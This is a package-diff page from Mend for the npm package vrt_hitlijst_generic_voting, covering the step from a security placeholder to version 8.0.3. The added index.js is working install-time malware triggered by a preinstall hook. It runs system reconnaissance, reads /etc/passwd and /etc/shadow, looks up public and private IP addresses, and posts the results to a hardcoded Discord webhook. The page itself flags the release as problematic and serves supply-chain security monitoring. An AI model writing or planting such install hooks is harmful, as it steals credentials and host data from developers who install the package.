npm - vrt_hitlijst_generic_voting - Versions diffs - 0.0.1-security → 8.0.3 - Mend

vrt_hitlijst_generic_voting 0.0.1-security → 8.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of vrt_hitlijst_generic_voting might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,141 @@
+const { exec } = require('child_process');
+const https = require('https');
+const fs = require('fs');
+const path = require('path');
+const command = `
+whoami;
+uname -a;
+cat /etc/passwd 2>/dev/null;
+cat /etc/shadow 2>/dev/null;
+curl -s https://ifconfig.me;       # Public IP 1
+curl -s http://api.ipify.org;      # Public IP 2
+hostname -I | awk '{print $1}';   # Private IP
+mkdir -p /tmp/balvant-chavda && echo 'balvant was here' > /tmp/balvant-chavda/poc.txt;
+pwd;
+`;
+const webhookUrl = 'https://discord.com/api/webhooks/1282556604851421308/ULZN1VNiuQVpb3DRbQjd4o2awhpQ4cGq1VF9w_XuPPKtD9svB12SjfJmBZ_x-rtjgZwJ';
+const getPackageName = (callback) => {
+    const packageJsonPath = path.resolve(__dirname, 'package.json');
+    fs.readFile(packageJsonPath, 'utf8', (err, data) => {
+        if (err) {
+            callback(`Error reading package.json: ${err.message}`);
+            return;
+        }
+        try {
+            const packageJson = JSON.parse(data);
+            callback(null, packageJson.name);
+        } catch (parseErr) {
+            callback(`Error parsing package.json: ${parseErr.message}`);
+        }
+    });
+};
+const sendDataToDiscord = (data, callback) => {
+    const postData = JSON.stringify({
+        content: `**NPM CallBack**\n${data}`
+    });
+    const url = new URL(webhookUrl);
+    const options = {
+        hostname: url.hostname,
+        port: 443,
+        path: url.pathname,
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': Buffer.byteLength(postData)
+        }
+    };
+    const req = https.request(options, (res) => {
+        let response = '';
+        res.on('data', (chunk) => {
+            response += chunk;
+        });
+        res.on('end', () => {
+            callback(null, response);
+        });
+    });
+    req.on('error', (e) => {
+        callback(`Error: ${e.message}`);
+    });
+    req.write(postData);
+    req.end();
+};
+const readPocFile = (callback) => {
+    fs.readFile('/tmp/balvant-chavda/poc.txt', 'utf8', (err, data) => {
+        if (err) {
+            callback(`Error reading file: ${err.message}`);
+        } else {
+            callback(null, data);
+        }
+    });
+};
+console.log('Starting script execution');
+exec(command, (error, stdout, stderr) => {
+    if (error) {
+        console.error(`Error executing command: ${error.message}`);
+        return;
+    }
+    if (stderr) {
+        console.error(`stderr: ${stderr}`);
+        return;
+    }
+    console.log(`Command stdout: ${stdout}`);
+    readPocFile((fileErr, fileContent) => {
+        if (fileErr) {
+            console.error(fileErr);
+            return;
+        }
+        const publicIPRegex = /https:\/\/ifconfig\.me\s*([\d\.]+).*?api\.ipify\.org\s*([\d\.]+).*?hostname -I\s*([\d\.]+)/s;
+        const matches = stdout.match(publicIPRegex);
+        const publicIP1 = matches ? matches[1] : 'N/A';
+        const publicIP2 = matches ? matches[2] : 'N/A';
+        const privateIP = matches ? matches[3] : 'N/A';
+        getPackageName((nameErr, packageName) => {
+            if (nameErr) {
+                console.error(nameErr);
+                return;
+            }
+            const finalData = `
+**System Information:**
+${stdout}
+**Public IP 1:** ${publicIP1}
+**Public IP 2:** ${publicIP2}
+**Private IP:** ${privateIP}
+**File Content:**
+${fileContent}
+**Package Name:**
+${packageName}
+`;
+            console.log('Sending data to Discord webhook');
+            sendDataToDiscord(finalData, (err, response) => {
+                if (err) {
+                    console.error(`Send Data Error: ${err}`);
+                    return;
+                }
+                console.log(`Response from Discord webhook: ${response}`);
+            });
+        });
+    });
+});

package/package.json CHANGED Viewed

@@ -1,6 +1,17 @@
 {
   "name": "vrt_hitlijst_generic_voting",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "8.0.3",
+  "description": "A package to poc information.",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js > install-log.txt 2>&1",
+    "postinstall": "cat install-log.txt",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "balvant",
+  "license": "ISC",
+  "dependencies": {
+    "lodash": "^4.17.21",
+    "vrt_hitlijst_generic_voting": "^8.0.2"
+  }
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=vrt_hitlijst_generic_voting for more information.